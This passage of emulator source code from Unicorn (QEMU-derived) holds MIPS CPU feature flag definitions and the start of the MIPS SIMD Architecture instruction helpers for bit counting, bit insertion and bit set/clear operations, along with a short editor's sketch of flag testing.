#define ASE_MICROMIPS     0x0000010000000000ULL
#define ASE_MSA           0x0000020000000000ULL

/*
 * bits 48-55: vendor-specific base instruction sets
 */
#define INSN_LOONGSON2E   0x0001000000000000ULL
#define INSN_LOONGSON2F   0x0002000000000000ULL
#define INSN_VR54XX       0x0004000000000000ULL
#define INSN_R5900        0x0008000000000000ULL

/*
 * bits 56-63: vendor-specific ASEs
 */
#define ASE_MMI           0x0100000000000000ULL
#define ASE_MXU           0x0200000000000000ULL
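Because each ISA revision and ASE occupies one bit, an insn_flags membership test is a single AND, and the CPU_* composites defined next simply OR older revisions into newer ones so each release is a superset of its predecessors. A minimal sketch (editor's addition, not part of the sources; the SKETCH_* copies of two mask values and the sample cpu_flags are illustrative):

/*
 * Illustrative sketch (editor's addition): testing feature bits in a 64-bit
 * insn_flags-style mask. The two values are copied from the defines above.
 */
#include <stdint.h>
#include <stdio.h>

#define SKETCH_ISA_MIPS32  0x0000000000000020ULL
#define SKETCH_ASE_DSP     0x0000000800000000ULL

int main(void)
{
    uint64_t cpu_flags = SKETCH_ISA_MIPS32 | SKETCH_ASE_DSP; /* sample CPU */

    if (cpu_flags & SKETCH_ISA_MIPS32) {
        printf("MIPS32 base ISA available\n");
    }
    if (cpu_flags & SKETCH_ASE_DSP) {
        printf("DSP ASE available\n");
    }
    return 0;
}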
/* MIPS CPU defines. */
#define CPU_MIPS1       (ISA_MIPS1)
#define CPU_MIPS2       (CPU_MIPS1 | ISA_MIPS2)
#define CPU_MIPS3       (CPU_MIPS2 | ISA_MIPS3)
#define CPU_MIPS4       (CPU_MIPS3 | ISA_MIPS4)
#define CPU_VR54XX      (CPU_MIPS4 | INSN_VR54XX)
#define CPU_R5900       (CPU_MIPS3 | INSN_R5900)
#define CPU_LOONGSON2E  (CPU_MIPS3 | INSN_LOONGSON2E)
#define CPU_LOONGSON2F  (CPU_MIPS3 | INSN_LOONGSON2F)

#define CPU_MIPS5       (CPU_MIPS4 | ISA_MIPS5)

/* MIPS Technologies "Release 1" */
#define CPU_MIPS32      (CPU_MIPS2 | ISA_MIPS32)
#define CPU_MIPS64      (CPU_MIPS5 | CPU_MIPS32 | ISA_MIPS64)

/* MIPS Technologies "Release 2" */
#define CPU_MIPS32R2    (CPU_MIPS32 | ISA_MIPS32R2)
#define CPU_MIPS64R2    (CPU_MIPS64 | CPU_MIPS32R2 | ISA_MIPS64R2)

/* MIPS Technologies "Release 3" */
#define CPU_MIPS32R3    (CPU_MIPS32R2 | ISA_MIPS32R3)
#define CPU_MIPS64R3    (CPU_MIPS64R2 | CPU_MIPS32R3 | ISA_MIPS64R3)

/* MIPS Technologies "Release 5" */
#define CPU_MIPS32R5    (CPU_MIPS32R3 | ISA_MIPS32R5)
#define CPU_MIPS64R5    (CPU_MIPS64R3 | CPU_MIPS32R5 | ISA_MIPS64R5)

/* MIPS Technologies "Release 6" */
#define CPU_MIPS32R6    (CPU_MIPS32R5 | ISA_MIPS32R6)
#define CPU_MIPS64R6    (CPU_MIPS64R5 | CPU_MIPS32R6 | ISA_MIPS64R6)

/* Wave Computing: "nanoMIPS" */
#define CPU_NANOMIPS32  (CPU_MIPS32R6 | ISA_NANOMIPS32)

/*
 * Strictly follow the architecture standard:
 * - Disallow "special" instruction handling for PMON/SPIM.
 * Note that we still maintain Count/Compare to match the host clock.
 *
 * #define MIPS_STRICT_STANDARD 1
 */

#endif /* QEMU_MIPS_DEFS_H */

unicorn-2.1.1/qemu/target/mips/msa_helper.c

/*
 * MIPS SIMD Architecture Module Instruction emulation helpers for QEMU.
 *
 * Copyright (c) 2014 Imagination Technologies
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" /* Data format min and max values */ #define DF_BITS(df) (1ULL << ((df) + 3)) #define DF_MAX_INT(df) (int64_t)((1LL << (DF_BITS(df) - 1)) - 1) #define M_MAX_INT(m) (int64_t)((1LL << ((m) - 1)) - 1) #ifdef _MSC_VER #define DF_MIN_INT(df) (int64_t)(0 - (1LL << (DF_BITS(df) - 1))) #define M_MIN_INT(m) (int64_t)(0 - (1LL << ((m) - 1))) #define DF_MAX_UINT(df) (uint64_t)(0xffffffffffffffffULL >> (64 - DF_BITS(df))) #define M_MAX_UINT(m) (uint64_t)(0xffffffffffffffffULL >> (64 - (m))) #else #define DF_MIN_INT(df) (int64_t)(-(1LL << (DF_BITS(df) - 1))) #define M_MIN_INT(m) (int64_t)(-(1LL << ((m) - 1))) #define DF_MAX_UINT(df) (uint64_t)(-1ULL >> (64 - DF_BITS(df))) #define M_MAX_UINT(m) (uint64_t)(-1ULL >> (64 - (m))) #endif #define UNSIGNED(x, df) ((x) & DF_MAX_UINT(df)) #define SIGNED(x, df) \ ((((int64_t)x) << (64 - DF_BITS(df))) >> (64 - DF_BITS(df))) /* Element-by-element access macros */ #define DF_ELEMENTS(df) (MSA_WRLEN / DF_BITS(df)) /* * Bit Count * --------- * * +---------------+----------------------------------------------------------+ * | NLOC.B | Vector Leading Ones Count (byte) | * | NLOC.H | Vector Leading Ones Count (halfword) | * | NLOC.W | Vector Leading Ones Count (word) | * | NLOC.D | Vector Leading Ones Count (doubleword) | * | NLZC.B | Vector Leading Zeros Count (byte) | * | NLZC.H | Vector Leading Zeros Count (halfword) | * | NLZC.W | Vector Leading Zeros Count (word) | * | NLZC.D | Vector Leading Zeros Count (doubleword) | * | PCNT.B | Vector Population Count (byte) | * | PCNT.H | Vector Population Count (halfword) | * | PCNT.W | Vector Population Count (word) | * | PCNT.D | Vector Population Count (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_nlzc_df(uint32_t df, int64_t arg) { uint64_t x, y; int n, c; x = UNSIGNED(arg, df); n = DF_BITS(df); c = DF_BITS(df) / 2; do { y = x >> c; if (y != 0) { n = n - c; x = y; } c = c >> 1; } while (c != 0); return n - x; } static inline int64_t msa_nloc_df(uint32_t df, int64_t arg) { return msa_nlzc_df(df, UNSIGNED((~arg), df)); } void helper_msa_nloc_b(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->b[0] = msa_nloc_df(DF_BYTE, pws->b[0]); pwd->b[1] = msa_nloc_df(DF_BYTE, pws->b[1]); pwd->b[2] = msa_nloc_df(DF_BYTE, pws->b[2]); pwd->b[3] = msa_nloc_df(DF_BYTE, pws->b[3]); pwd->b[4] = msa_nloc_df(DF_BYTE, pws->b[4]); pwd->b[5] = msa_nloc_df(DF_BYTE, pws->b[5]); pwd->b[6] = msa_nloc_df(DF_BYTE, pws->b[6]); pwd->b[7] = msa_nloc_df(DF_BYTE, pws->b[7]); pwd->b[8] = msa_nloc_df(DF_BYTE, pws->b[8]); pwd->b[9] = msa_nloc_df(DF_BYTE, pws->b[9]); pwd->b[10] = msa_nloc_df(DF_BYTE, pws->b[10]); pwd->b[11] = msa_nloc_df(DF_BYTE, pws->b[11]); pwd->b[12] = msa_nloc_df(DF_BYTE, pws->b[12]); pwd->b[13] = msa_nloc_df(DF_BYTE, pws->b[13]); pwd->b[14] = msa_nloc_df(DF_BYTE, pws->b[14]); pwd->b[15] = msa_nloc_df(DF_BYTE, pws->b[15]); } void helper_msa_nloc_h(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->h[0] = msa_nloc_df(DF_HALF, pws->h[0]); pwd->h[1] = msa_nloc_df(DF_HALF, pws->h[1]); pwd->h[2] = msa_nloc_df(DF_HALF, pws->h[2]); pwd->h[3] = msa_nloc_df(DF_HALF, pws->h[3]); pwd->h[4] = msa_nloc_df(DF_HALF, pws->h[4]); pwd->h[5] = msa_nloc_df(DF_HALF, 
pws->h[5]); pwd->h[6] = msa_nloc_df(DF_HALF, pws->h[6]); pwd->h[7] = msa_nloc_df(DF_HALF, pws->h[7]); } void helper_msa_nloc_w(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->w[0] = msa_nloc_df(DF_WORD, pws->w[0]); pwd->w[1] = msa_nloc_df(DF_WORD, pws->w[1]); pwd->w[2] = msa_nloc_df(DF_WORD, pws->w[2]); pwd->w[3] = msa_nloc_df(DF_WORD, pws->w[3]); } void helper_msa_nloc_d(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->d[0] = msa_nloc_df(DF_DOUBLE, pws->d[0]); pwd->d[1] = msa_nloc_df(DF_DOUBLE, pws->d[1]); } void helper_msa_nlzc_b(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->b[0] = msa_nlzc_df(DF_BYTE, pws->b[0]); pwd->b[1] = msa_nlzc_df(DF_BYTE, pws->b[1]); pwd->b[2] = msa_nlzc_df(DF_BYTE, pws->b[2]); pwd->b[3] = msa_nlzc_df(DF_BYTE, pws->b[3]); pwd->b[4] = msa_nlzc_df(DF_BYTE, pws->b[4]); pwd->b[5] = msa_nlzc_df(DF_BYTE, pws->b[5]); pwd->b[6] = msa_nlzc_df(DF_BYTE, pws->b[6]); pwd->b[7] = msa_nlzc_df(DF_BYTE, pws->b[7]); pwd->b[8] = msa_nlzc_df(DF_BYTE, pws->b[8]); pwd->b[9] = msa_nlzc_df(DF_BYTE, pws->b[9]); pwd->b[10] = msa_nlzc_df(DF_BYTE, pws->b[10]); pwd->b[11] = msa_nlzc_df(DF_BYTE, pws->b[11]); pwd->b[12] = msa_nlzc_df(DF_BYTE, pws->b[12]); pwd->b[13] = msa_nlzc_df(DF_BYTE, pws->b[13]); pwd->b[14] = msa_nlzc_df(DF_BYTE, pws->b[14]); pwd->b[15] = msa_nlzc_df(DF_BYTE, pws->b[15]); } void helper_msa_nlzc_h(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->h[0] = msa_nlzc_df(DF_HALF, pws->h[0]); pwd->h[1] = msa_nlzc_df(DF_HALF, pws->h[1]); pwd->h[2] = msa_nlzc_df(DF_HALF, pws->h[2]); pwd->h[3] = msa_nlzc_df(DF_HALF, pws->h[3]); pwd->h[4] = msa_nlzc_df(DF_HALF, pws->h[4]); pwd->h[5] = msa_nlzc_df(DF_HALF, pws->h[5]); pwd->h[6] = msa_nlzc_df(DF_HALF, pws->h[6]); pwd->h[7] = msa_nlzc_df(DF_HALF, pws->h[7]); } void helper_msa_nlzc_w(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->w[0] = msa_nlzc_df(DF_WORD, pws->w[0]); pwd->w[1] = msa_nlzc_df(DF_WORD, pws->w[1]); pwd->w[2] = msa_nlzc_df(DF_WORD, pws->w[2]); pwd->w[3] = msa_nlzc_df(DF_WORD, pws->w[3]); } void helper_msa_nlzc_d(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->d[0] = msa_nlzc_df(DF_DOUBLE, pws->d[0]); pwd->d[1] = msa_nlzc_df(DF_DOUBLE, pws->d[1]); } static inline int64_t msa_pcnt_df(uint32_t df, int64_t arg) { uint64_t x; x = UNSIGNED(arg, df); x = (x & 0x5555555555555555ULL) + ((x >> 1) & 0x5555555555555555ULL); x = (x & 0x3333333333333333ULL) + ((x >> 2) & 0x3333333333333333ULL); x = (x & 0x0F0F0F0F0F0F0F0FULL) + ((x >> 4) & 0x0F0F0F0F0F0F0F0FULL); x = (x & 0x00FF00FF00FF00FFULL) + ((x >> 8) & 0x00FF00FF00FF00FFULL); x = (x & 0x0000FFFF0000FFFFULL) + ((x >> 16) & 0x0000FFFF0000FFFFULL); x = (x & 0x00000000FFFFFFFFULL) + ((x >> 32)); return x; } void helper_msa_pcnt_b(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->b[0] = msa_pcnt_df(DF_BYTE, pws->b[0]); pwd->b[1] = msa_pcnt_df(DF_BYTE, pws->b[1]); pwd->b[2] = msa_pcnt_df(DF_BYTE, pws->b[2]); pwd->b[3] = msa_pcnt_df(DF_BYTE, pws->b[3]); pwd->b[4] = 
msa_pcnt_df(DF_BYTE, pws->b[4]); pwd->b[5] = msa_pcnt_df(DF_BYTE, pws->b[5]); pwd->b[6] = msa_pcnt_df(DF_BYTE, pws->b[6]); pwd->b[7] = msa_pcnt_df(DF_BYTE, pws->b[7]); pwd->b[8] = msa_pcnt_df(DF_BYTE, pws->b[8]); pwd->b[9] = msa_pcnt_df(DF_BYTE, pws->b[9]); pwd->b[10] = msa_pcnt_df(DF_BYTE, pws->b[10]); pwd->b[11] = msa_pcnt_df(DF_BYTE, pws->b[11]); pwd->b[12] = msa_pcnt_df(DF_BYTE, pws->b[12]); pwd->b[13] = msa_pcnt_df(DF_BYTE, pws->b[13]); pwd->b[14] = msa_pcnt_df(DF_BYTE, pws->b[14]); pwd->b[15] = msa_pcnt_df(DF_BYTE, pws->b[15]); } void helper_msa_pcnt_h(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->h[0] = msa_pcnt_df(DF_HALF, pws->h[0]); pwd->h[1] = msa_pcnt_df(DF_HALF, pws->h[1]); pwd->h[2] = msa_pcnt_df(DF_HALF, pws->h[2]); pwd->h[3] = msa_pcnt_df(DF_HALF, pws->h[3]); pwd->h[4] = msa_pcnt_df(DF_HALF, pws->h[4]); pwd->h[5] = msa_pcnt_df(DF_HALF, pws->h[5]); pwd->h[6] = msa_pcnt_df(DF_HALF, pws->h[6]); pwd->h[7] = msa_pcnt_df(DF_HALF, pws->h[7]); } void helper_msa_pcnt_w(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->w[0] = msa_pcnt_df(DF_WORD, pws->w[0]); pwd->w[1] = msa_pcnt_df(DF_WORD, pws->w[1]); pwd->w[2] = msa_pcnt_df(DF_WORD, pws->w[2]); pwd->w[3] = msa_pcnt_df(DF_WORD, pws->w[3]); } void helper_msa_pcnt_d(CPUMIPSState *env, uint32_t wd, uint32_t ws) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); pwd->d[0] = msa_pcnt_df(DF_DOUBLE, pws->d[0]); pwd->d[1] = msa_pcnt_df(DF_DOUBLE, pws->d[1]); } /* * Bit Move * -------- * * +---------------+----------------------------------------------------------+ * | BINSL.B | Vector Bit Insert Left (byte) | * | BINSL.H | Vector Bit Insert Left (halfword) | * | BINSL.W | Vector Bit Insert Left (word) | * | BINSL.D | Vector Bit Insert Left (doubleword) | * | BINSR.B | Vector Bit Insert Right (byte) | * | BINSR.H | Vector Bit Insert Right (halfword) | * | BINSR.W | Vector Bit Insert Right (word) | * | BINSR.D | Vector Bit Insert Right (doubleword) | * | BMNZ.V | Vector Bit Move If Not Zero | * | BMZ.V | Vector Bit Move If Zero | * | BSEL.V | Vector Bit Select | * +---------------+----------------------------------------------------------+ */ /* Data format bit position and unsigned values */ #define BIT_POSITION(x, df) ((uint64_t)(x) % DF_BITS(df)) static inline int64_t msa_binsl_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_dest = UNSIGNED(dest, df); int32_t sh_d = BIT_POSITION(arg2, df) + 1; int32_t sh_a = DF_BITS(df) - sh_d; if (sh_d == DF_BITS(df)) { return u_arg1; } else { return UNSIGNED(UNSIGNED(u_dest << sh_d, df) >> sh_d, df) | UNSIGNED(UNSIGNED(u_arg1 >> sh_a, df) << sh_a, df); } } void helper_msa_binsl_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_binsl_df(DF_BYTE, pwd->b[0], pws->b[0], pwt->b[0]); pwd->b[1] = msa_binsl_df(DF_BYTE, pwd->b[1], pws->b[1], pwt->b[1]); pwd->b[2] = msa_binsl_df(DF_BYTE, pwd->b[2], pws->b[2], pwt->b[2]); pwd->b[3] = msa_binsl_df(DF_BYTE, pwd->b[3], pws->b[3], pwt->b[3]); pwd->b[4] = msa_binsl_df(DF_BYTE, pwd->b[4], pws->b[4], pwt->b[4]); pwd->b[5] = msa_binsl_df(DF_BYTE, pwd->b[5], pws->b[5], pwt->b[5]); pwd->b[6] = msa_binsl_df(DF_BYTE, pwd->b[6], pws->b[6], pwt->b[6]); 
pwd->b[7] = msa_binsl_df(DF_BYTE, pwd->b[7], pws->b[7], pwt->b[7]); pwd->b[8] = msa_binsl_df(DF_BYTE, pwd->b[8], pws->b[8], pwt->b[8]); pwd->b[9] = msa_binsl_df(DF_BYTE, pwd->b[9], pws->b[9], pwt->b[9]); pwd->b[10] = msa_binsl_df(DF_BYTE, pwd->b[10], pws->b[10], pwt->b[10]); pwd->b[11] = msa_binsl_df(DF_BYTE, pwd->b[11], pws->b[11], pwt->b[11]); pwd->b[12] = msa_binsl_df(DF_BYTE, pwd->b[12], pws->b[12], pwt->b[12]); pwd->b[13] = msa_binsl_df(DF_BYTE, pwd->b[13], pws->b[13], pwt->b[13]); pwd->b[14] = msa_binsl_df(DF_BYTE, pwd->b[14], pws->b[14], pwt->b[14]); pwd->b[15] = msa_binsl_df(DF_BYTE, pwd->b[15], pws->b[15], pwt->b[15]); } void helper_msa_binsl_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_binsl_df(DF_HALF, pwd->h[0], pws->h[0], pwt->h[0]); pwd->h[1] = msa_binsl_df(DF_HALF, pwd->h[1], pws->h[1], pwt->h[1]); pwd->h[2] = msa_binsl_df(DF_HALF, pwd->h[2], pws->h[2], pwt->h[2]); pwd->h[3] = msa_binsl_df(DF_HALF, pwd->h[3], pws->h[3], pwt->h[3]); pwd->h[4] = msa_binsl_df(DF_HALF, pwd->h[4], pws->h[4], pwt->h[4]); pwd->h[5] = msa_binsl_df(DF_HALF, pwd->h[5], pws->h[5], pwt->h[5]); pwd->h[6] = msa_binsl_df(DF_HALF, pwd->h[6], pws->h[6], pwt->h[6]); pwd->h[7] = msa_binsl_df(DF_HALF, pwd->h[7], pws->h[7], pwt->h[7]); } void helper_msa_binsl_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_binsl_df(DF_WORD, pwd->w[0], pws->w[0], pwt->w[0]); pwd->w[1] = msa_binsl_df(DF_WORD, pwd->w[1], pws->w[1], pwt->w[1]); pwd->w[2] = msa_binsl_df(DF_WORD, pwd->w[2], pws->w[2], pwt->w[2]); pwd->w[3] = msa_binsl_df(DF_WORD, pwd->w[3], pws->w[3], pwt->w[3]); } void helper_msa_binsl_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_binsl_df(DF_DOUBLE, pwd->d[0], pws->d[0], pwt->d[0]); pwd->d[1] = msa_binsl_df(DF_DOUBLE, pwd->d[1], pws->d[1], pwt->d[1]); } static inline int64_t msa_binsr_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { uint64_t u_arg1 = UNSIGNED(arg1, df); uint64_t u_dest = UNSIGNED(dest, df); int32_t sh_d = BIT_POSITION(arg2, df) + 1; int32_t sh_a = DF_BITS(df) - sh_d; if (sh_d == DF_BITS(df)) { return u_arg1; } else { return UNSIGNED(UNSIGNED(u_dest >> sh_d, df) << sh_d, df) | UNSIGNED(UNSIGNED(u_arg1 << sh_a, df) >> sh_a, df); } } void helper_msa_binsr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_binsr_df(DF_BYTE, pwd->b[0], pws->b[0], pwt->b[0]); pwd->b[1] = msa_binsr_df(DF_BYTE, pwd->b[1], pws->b[1], pwt->b[1]); pwd->b[2] = msa_binsr_df(DF_BYTE, pwd->b[2], pws->b[2], pwt->b[2]); pwd->b[3] = msa_binsr_df(DF_BYTE, pwd->b[3], pws->b[3], pwt->b[3]); pwd->b[4] = msa_binsr_df(DF_BYTE, pwd->b[4], pws->b[4], pwt->b[4]); pwd->b[5] = msa_binsr_df(DF_BYTE, pwd->b[5], pws->b[5], pwt->b[5]); pwd->b[6] = msa_binsr_df(DF_BYTE, pwd->b[6], pws->b[6], pwt->b[6]); pwd->b[7] = msa_binsr_df(DF_BYTE, pwd->b[7], pws->b[7], pwt->b[7]); pwd->b[8] = msa_binsr_df(DF_BYTE, pwd->b[8], pws->b[8], pwt->b[8]); pwd->b[9] = msa_binsr_df(DF_BYTE, pwd->b[9], pws->b[9], pwt->b[9]); 
pwd->b[10] = msa_binsr_df(DF_BYTE, pwd->b[10], pws->b[10], pwt->b[10]); pwd->b[11] = msa_binsr_df(DF_BYTE, pwd->b[11], pws->b[11], pwt->b[11]); pwd->b[12] = msa_binsr_df(DF_BYTE, pwd->b[12], pws->b[12], pwt->b[12]); pwd->b[13] = msa_binsr_df(DF_BYTE, pwd->b[13], pws->b[13], pwt->b[13]); pwd->b[14] = msa_binsr_df(DF_BYTE, pwd->b[14], pws->b[14], pwt->b[14]); pwd->b[15] = msa_binsr_df(DF_BYTE, pwd->b[15], pws->b[15], pwt->b[15]); } void helper_msa_binsr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->h[0] = msa_binsr_df(DF_HALF, pwd->h[0], pws->h[0], pwt->h[0]); pwd->h[1] = msa_binsr_df(DF_HALF, pwd->h[1], pws->h[1], pwt->h[1]); pwd->h[2] = msa_binsr_df(DF_HALF, pwd->h[2], pws->h[2], pwt->h[2]); pwd->h[3] = msa_binsr_df(DF_HALF, pwd->h[3], pws->h[3], pwt->h[3]); pwd->h[4] = msa_binsr_df(DF_HALF, pwd->h[4], pws->h[4], pwt->h[4]); pwd->h[5] = msa_binsr_df(DF_HALF, pwd->h[5], pws->h[5], pwt->h[5]); pwd->h[6] = msa_binsr_df(DF_HALF, pwd->h[6], pws->h[6], pwt->h[6]); pwd->h[7] = msa_binsr_df(DF_HALF, pwd->h[7], pws->h[7], pwt->h[7]); } void helper_msa_binsr_w(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->w[0] = msa_binsr_df(DF_WORD, pwd->w[0], pws->w[0], pwt->w[0]); pwd->w[1] = msa_binsr_df(DF_WORD, pwd->w[1], pws->w[1], pwt->w[1]); pwd->w[2] = msa_binsr_df(DF_WORD, pwd->w[2], pws->w[2], pwt->w[2]); pwd->w[3] = msa_binsr_df(DF_WORD, pwd->w[3], pws->w[3], pwt->w[3]); } void helper_msa_binsr_d(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = msa_binsr_df(DF_DOUBLE, pwd->d[0], pws->d[0], pwt->d[0]); pwd->d[1] = msa_binsr_df(DF_DOUBLE, pwd->d[1], pws->d[1], pwt->d[1]); } void helper_msa_bmnz_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = UNSIGNED( \ ((pwd->d[0] & (~pwt->d[0])) | (pws->d[0] & pwt->d[0])), DF_DOUBLE); pwd->d[1] = UNSIGNED( \ ((pwd->d[1] & (~pwt->d[1])) | (pws->d[1] & pwt->d[1])), DF_DOUBLE); } void helper_msa_bmz_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = UNSIGNED( \ ((pwd->d[0] & pwt->d[0]) | (pws->d[0] & (~pwt->d[0]))), DF_DOUBLE); pwd->d[1] = UNSIGNED( \ ((pwd->d[1] & pwt->d[1]) | (pws->d[1] & (~pwt->d[1]))), DF_DOUBLE); } void helper_msa_bsel_v(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->d[0] = UNSIGNED( \ (pws->d[0] & (~pwd->d[0])) | (pwt->d[0] & pwd->d[0]), DF_DOUBLE); pwd->d[1] = UNSIGNED( \ (pws->d[1] & (~pwd->d[1])) | (pwt->d[1] & pwd->d[1]), DF_DOUBLE); } /* * Bit Set * ------- * * +---------------+----------------------------------------------------------+ * | BCLR.B | Vector Bit Clear (byte) | * | BCLR.H | Vector Bit Clear (halfword) | * | BCLR.W | Vector Bit Clear (word) | * | BCLR.D | Vector Bit Clear (doubleword) | * | BNEG.B | Vector Bit Negate (byte) | * | BNEG.H | Vector 
Bit Negate (halfword) | * | BNEG.W | Vector Bit Negate (word) | * | BNEG.D | Vector Bit Negate (doubleword) | * | BSET.B | Vector Bit Set (byte) | * | BSET.H | Vector Bit Set (halfword) | * | BSET.W | Vector Bit Set (word) | * | BSET.D | Vector Bit Set (doubleword) | * +---------------+----------------------------------------------------------+ */ static inline int64_t msa_bclr_df(uint32_t df, int64_t arg1, int64_t arg2) { int32_t b_arg2 = BIT_POSITION(arg2, df); return UNSIGNED(arg1 & (~(1LL << b_arg2)), df); } void helper_msa_bclr_b(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); pwd->b[0] = msa_bclr_df(DF_BYTE, pws->b[0], pwt->b[0]); pwd->b[1] = msa_bclr_df(DF_BYTE, pws->b[1], pwt->b[1]); pwd->b[2] = msa_bclr_df(DF_BYTE, pws->b[2], pwt->b[2]); pwd->b[3] = msa_bclr_df(DF_BYTE, pws->b[3], pwt->b[3]); pwd->b[4] = msa_bclr_df(DF_BYTE, pws->b[4], pwt->b[4]); pwd->b[5] = msa_bclr_df(DF_BYTE, pws->b[5], pwt->b[5]); pwd->b[6] = msa_bclr_df(DF_BYTE, pws->b[6], pwt->b[6]); pwd->b[7] = msa_bclr_df(DF_BYTE, pws->b[7], pwt->b[7]); pwd->b[8] = msa_bclr_df(DF_BYTE, pws->b[8], pwt->b[8]); pwd->b[9] = msa_bclr_df(DF_BYTE, pws->b[9], pwt->b[9]); pwd->b[10] = msa_bclr_df(DF_BYTE, pws->b[10], pwt->b[10]); pwd->b[11] = msa_bclr_df(DF_BYTE, pws->b[11], pwt->b[11]); pwd->b[12] = msa_bclr_df(DF_BYTE, pws->b[12], pwt->b[12]); pwd->b[13] = msa_bclr_df(DF_BYTE, pws->b[13], pwt->b[13]); pwd->b[14] = msa_bclr_df(DF_BYTE, pws->b[14], pwt->b[14]); pwd->b[15] = msa_bclr_df(DF_BYTE, pws->b[15], pwt->b[15]); } void helper_msa_bclr_h(CPUMIPSState *env, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = 